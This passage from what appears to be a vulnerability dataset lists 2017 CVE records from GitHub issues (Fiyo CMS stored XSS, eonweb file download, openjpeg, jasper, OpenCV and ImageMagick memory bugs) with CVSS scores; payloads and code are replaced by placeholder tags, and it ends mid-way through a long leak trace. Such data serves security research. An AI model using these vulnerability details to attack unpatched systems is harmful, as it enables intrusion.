  8498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8499. "severity": "MEDIUM",
  8500. "baseScore": 6.5,
  8501. "impactScore": 3.6,
  8502. "exploitabilityScore": 2.8
  8503. },
  8504. {
  8505. "CVE_ID": "CVE-2017-13778",
  8506. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/8",
  8507. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/8",
  8508. "Repo_new": "fiyocms/fiyocms",
  8509. "Issue_Created_At": "2017-08-29T12:32:46Z",
  8510. "description": "PATHTAG $_POST[site_name] variable exists Storage XSS vulnerability. Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work PATHTAG $_POST[site_name] variable exists Storage XSS vulnerability ERRORTAG '$_POST[site_name]' is not filtered,and Write directly to the database APITAG and then PATHTAG CODETAG It does not do any filtering, directly the \u2019site_name\u2018 output page So when i set the 'site_name' to xss payload,there is a storage xss APITAG",
  8511. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8512. "severity": "MEDIUM",
  8513. "baseScore": 6.1,
  8514. "impactScore": 2.7,
  8515. "exploitabilityScore": 2.8
  8516. },
  8517. {
  8518. "CVE_ID": "CVE-2017-13780",
  8519. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/8",
  8520. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/8",
  8521. "Repo_new": "eyesofnetworkcommunity/eonweb",
  8522. "Issue_Created_At": "2017-08-30T15:41:25Z",
  8523. "description": "PATHTAG $_GET FILETAG CODETAG '$_GET[\"file\"]' is not filtered,and exists arbitrary file download vulnerability So when we open this url: [ URLTAG ) it would download the file PATHTAG APITAG and we can get the contents of this file APITAG",
  8524. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  8525. "severity": "HIGH",
  8526. "baseScore": 7.5,
  8527. "impactScore": 3.6,
  8528. "exploitabilityScore": 3.9
  8529. },
  8530. {
  8531. "CVE_ID": "CVE-2017-14039",
  8532. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/992",
  8533. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/992",
  8534. "Repo_new": "uclouvain/openjpeg",
  8535. "Issue_Created_At": "2017-08-16T14:35:03Z",
  8536. "description": "heap base buffer overflow in opj_t2_encode_packet (t2.c). On master: ERRORTAG Testcase: URLTAG",
  8537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8538. "severity": "HIGH",
  8539. "baseScore": 8.8,
  8540. "impactScore": 5.9,
  8541. "exploitabilityScore": 2.8
  8542. },
  8543. {
  8544. "CVE_ID": "CVE-2017-14041",
  8545. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/997",
  8546. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/997",
  8547. "Repo_new": "uclouvain/openjpeg",
  8548. "Issue_Created_At": "2017-08-18T11:28:36Z",
  8549. "description": "stack based buffer overflow write in pgxtoimage (/convert.c). On master, I didn't try on NUMBERTAG ERRORTAG Testcase: URLTAG Can you confirm if it affects NUMBERTAG too?",
  8550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8551. "severity": "HIGH",
  8552. "baseScore": 8.8,
  8553. "impactScore": 5.9,
  8554. "exploitabilityScore": 2.8
  8555. },
  8556. {
  8557. "CVE_ID": "CVE-2017-14060",
  8558. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/710",
  8559. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/710",
  8560. "Repo_new": "imagemagick/imagemagick",
  8561. "Issue_Created_At": "2017-08-31T07:54:41Z",
  8562. "description": "Null Pointer Dereference vulnerability triggered by malformed image files. A Null Pointer Dereference issues is present in the APITAG function within the PATHTAG file. The vulnerable code is as follows: ERRORTAG Here, the variable _q_ is getting the output of the function APITAG This function, in turn calls: ERRORTAG The APITAG function performs a series of asserts are explicitly returns NULL: ERRORTAG Once this NULL is returned back to the original function via APITAG , _q_ gets the NULL value. It gets used in a function call: APITAG It is finally de referenced in APITAG in the following line: APITAG Modifying the code to: APITAG Would avoid this vulnerability.",
  8563. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8564. "severity": "MEDIUM",
  8565. "baseScore": 6.5,
  8566. "impactScore": 3.6,
  8567. "exploitabilityScore": 2.8
  8568. },
  8569. {
  8570. "CVE_ID": "CVE-2017-14063",
  8571. "Issue_Url_old": "https://github.com/AsyncHttpClient/async-http-client/issues/1455",
  8572. "Issue_Url_new": "https://github.com/asynchttpclient/async-http-client/issues/1455",
  8573. "Repo_new": "asynchttpclient/async-http-client",
  8574. "Issue_Created_At": "2017-08-28T08:43:49Z",
  8575. "description": "Security: AHC can be tricked into connecting to a different host. Issue is very similar to CVETAG that FILETAG . AHC url parser, APITAG can be tricked with a anchor containing a question mark into connecting to a different host. This issue also affects APITAG (as of NUMBERTAG u NUMBERTAG but not APITAG : CODETAG Credit goes to Nicolas Gr\u00e9goire from FILETAG .",
  8576. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  8577. "severity": "HIGH",
  8578. "baseScore": 7.5,
  8579. "impactScore": 3.6,
  8580. "exploitabilityScore": 3.9
  8581. },
  8582. {
  8583. "CVE_ID": "CVE-2017-14132",
  8584. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/147",
  8585. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/147",
  8586. "Repo_new": "jasper-software/jasper",
  8587. "Issue_Created_At": "2017-09-01T09:36:06Z",
  8588. "description": "heap based buffer overflow in APITAG A heap overflow is found in jasper, and the tested commit is NUMBERTAG f URLTAG ERRORTAG According to the output by APITAG I try to analyse with gdb. by set breadpoint at jas_image_copy CODETAG as we can see, the APITAG is NUMBERTAG and APITAG is NUMBERTAG too. in APITAG , newcmpts is alloc according the APITAG which is NUMBERTAG finnaly alloced by pass NUMBERTAG to malloc which will return a heap address. in the later access in APITAG APITAG APITAG defined in PATHTAG CODETAG poc file: FILETAG",
  8589. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8590. "severity": "MEDIUM",
  8591. "baseScore": 6.5,
  8592. "impactScore": 3.6,
  8593. "exploitabilityScore": 2.8
  8594. },
  8595. {
  8596. "CVE_ID": "CVE-2017-14136",
  8597. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9443",
  8598. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9443",
  8599. "Repo_new": "opencv/opencv",
  8600. "Issue_Created_At": "2017-08-23T08:45:32Z",
  8601. "description": "out of bound write cause Segmentfault. APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG the latest commit: b NUMBERTAG c NUMBERTAG e NUMBERTAG Operating System / Platform => Linux Compiler => gcc Detailed description An invalid writing occurs in function APITAG It is not the same with the previous one. ( URLTAG the crash details as follows: ERRORTAG Steps to reproduce just call the cv::imread to read the specified testcase. Please refer to the following url for the testcases: URLTAG APITAG",
  8602. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8603. "severity": "MEDIUM",
  8604. "baseScore": 6.5,
  8605. "impactScore": 3.6,
  8606. "exploitabilityScore": 2.8
  8607. },
  8608. {
  8609. "CVE_ID": "CVE-2017-14137",
  8610. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/641",
  8611. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/641",
  8612. "Repo_new": "imagemagick/imagemagick",
  8613. "Issue_Created_At": "2017-08-02T05:01:54Z",
  8614. "description": "memory exhausted in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG Here is the critical code ERRORTAG Credit: APITAG of Venustech",
  8615. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8616. "severity": "HIGH",
  8617. "baseScore": 7.5,
  8618. "impactScore": 3.6,
  8619. "exploitabilityScore": 3.9
  8620. },
  8621. {
  8622. "CVE_ID": "CVE-2017-14138",
  8623. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/639",
  8624. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/639",
  8625. "Repo_new": "imagemagick/imagemagick",
  8626. "Issue_Created_At": "2017-08-01T14:48:29Z",
  8627. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG",
  8628. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  8629. "severity": "CRITICAL",
  8630. "baseScore": 9.8,
  8631. "impactScore": 5.9,
  8632. "exploitabilityScore": 3.9
  8633. },
  8634. {
  8635. "CVE_ID": "CVE-2017-14139",
  8636. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/578",
  8637. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/578",
  8638. "Repo_new": "imagemagick/imagemagick",
  8639. "Issue_Created_At": "2017-07-17T04:58:46Z",
  8640. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick convert $FILE out.msl APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe NUMBERTAG d0b NUMBERTAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5eba in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5f5f in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df1dd in realloc APITAG NUMBERTAG f1fe7aa NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7aa NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec5e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df NUMBERTAG in posix_memalign APITAG NUMBERTAG f1fe7a9ecb2 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG df in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG ada9 in APITAG APITAG NUMBERTAG f1fe7a5a NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4ac NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG f in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4ac NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4ac NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4cd NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7ec4c1d in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4cd NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec4d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e1c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG a3 in APITAG APITAG NUMBERTAG f1fe7a4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG b in APITAG APITAG NUMBERTAG f1fe6f2c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fb NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fb NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec4d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fb NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG a1 in APITAG APITAG NUMBERTAG f1fe7ec4ca8 in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG a1 in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG b in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG defdd in calloc APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bed NUMBERTAG in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d0fa4 in APITAG APITAG NUMBERTAG 